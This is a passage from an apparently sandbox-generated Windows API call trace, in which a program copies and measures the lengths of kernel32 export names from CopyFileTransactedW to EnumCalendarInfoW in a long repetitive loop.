19 [0085.436] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0085.436] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0085.436] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0085.436] lstrlenA (lpString="COPYFILEW") returned 9 [0085.436] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0085.436] lstrlenA (lpString="COPYLZFILE") returned 10 [0085.436] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0085.436] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0085.436] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0085.436] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0085.436] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0085.436] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0085.436] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0085.436] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0085.436] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0085.436] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0085.436] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0085.436] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0085.436] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0085.436] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0085.436] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0085.437] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0085.437] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0085.437] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0085.437] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0085.437] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0085.437] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0085.437] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0085.437] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0085.437] lstrlenA (lpString="CREATEEVENTA") returned 12 [0085.437] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0085.437] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0085.437] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0085.437] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0085.437] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0085.437] lstrlenA (lpString="CREATEEVENTW") returned 12 [0085.437] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0085.437] lstrlenA (lpString="CREATEFIBER") returned 11 [0085.437] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0085.437] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0085.437] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0085.437] lstrlenA (lpString="CREATEFILEA") returned 11 [0085.437] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0085.437] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0085.437] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0085.437] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0085.437] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0085.437] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0085.437] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0085.437] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0085.437] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0085.437] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0085.438] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0085.438] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0085.438] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0085.438] lstrlenA (lpString="CREATEFILEW") returned 11 [0085.438] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0085.438] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0085.438] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0085.438] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0085.438] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0085.438] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0085.438] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0085.438] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0085.438] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0085.438] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0085.438] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0085.438] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0085.438] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0085.438] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0085.438] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0085.438] lstrlenA (lpString="CREATEJOBSET") returned 12 [0085.438] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0085.438] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0085.438] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0085.438] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0085.438] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0085.438] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0085.438] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0085.438] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0085.438] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0085.438] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0085.438] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0085.438] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0085.438] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0085.438] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0085.438] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0085.438] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0085.439] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0085.439] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0085.439] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0085.439] lstrlenA (lpString="CREATEPIPE") returned 10 [0085.439] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0085.439] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0085.439] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0085.439] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0085.439] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0085.439] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0085.439] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0085.439] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0085.439] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0085.439] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0085.439] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0085.439] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0085.439] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0085.439] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0085.439] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0085.439] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0085.439] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0085.439] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0085.439] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0085.439] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0085.439] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0085.439] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0085.439] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0085.439] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0085.439] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0085.439] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0085.439] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0085.439] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0085.439] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0085.439] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0085.439] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0085.440] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0085.440] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0085.440] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0085.440] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0085.440] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0085.440] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0085.440] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0085.440] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0085.440] lstrlenA (lpString="CREATETHREAD") returned 12 [0085.440] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0085.440] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0085.440] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0085.440] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0085.440] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0085.440] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0085.440] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0085.440] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0085.440] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0085.440] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0085.440] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0085.440] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0085.440] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0085.440] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0085.440] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0085.440] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0085.440] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0085.440] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0085.440] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0085.440] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0085.440] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0085.440] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0085.440] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0085.440] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0085.440] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0085.440] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0085.441] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0085.441] lstrlenA (lpString="CTRLROUTINE") returned 11 [0085.441] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0085.441] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0085.441] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0085.441] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0085.441] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0085.441] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0085.441] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0085.441] lstrlenA (lpString="DEBUGBREAK") returned 10 [0085.441] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0085.441] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0085.441] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0085.441] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0085.441] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0085.441] lstrlenA (lpString="DECODEPOINTER") returned 13 [0085.441] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0085.441] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0085.441] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0085.441] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0085.441] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0085.441] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0085.441] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0085.441] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0085.441] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0085.441] lstrlenA (lpString="DELETEATOM") returned 10 [0085.441] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0085.441] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0085.441] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0085.441] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0085.441] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0085.441] lstrlenA (lpString="DELETEFIBER") returned 11 [0085.441] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0085.441] lstrlenA (lpString="DELETEFILEA") returned 11 [0085.441] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0085.441] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0085.442] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0085.442] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0085.442] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0085.442] lstrlenA (lpString="DELETEFILEW") returned 11 [0085.442] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0085.442] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0085.442] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0085.442] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0085.442] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0085.442] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0085.442] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0085.442] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0085.442] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0085.442] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0085.442] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0085.442] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0085.442] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0085.442] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0085.442] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0085.442] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0085.442] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0085.442] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0085.442] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0085.442] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0085.442] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0085.442] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0085.442] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0085.442] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0085.442] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0085.442] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0085.442] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0085.442] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0085.442] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0085.442] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0085.442] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0085.442] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0085.443] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0085.443] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0085.443] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0085.443] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0085.443] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0085.443] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0085.443] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0085.443] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0085.443] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0085.443] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0085.443] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0085.443] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0085.443] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0085.443] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0085.443] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0085.443] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0085.443] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0085.443] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0085.443] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0085.443] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0085.443] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0085.443] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0085.443] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0085.443] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0085.443] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumCalendarInfoW" | out: 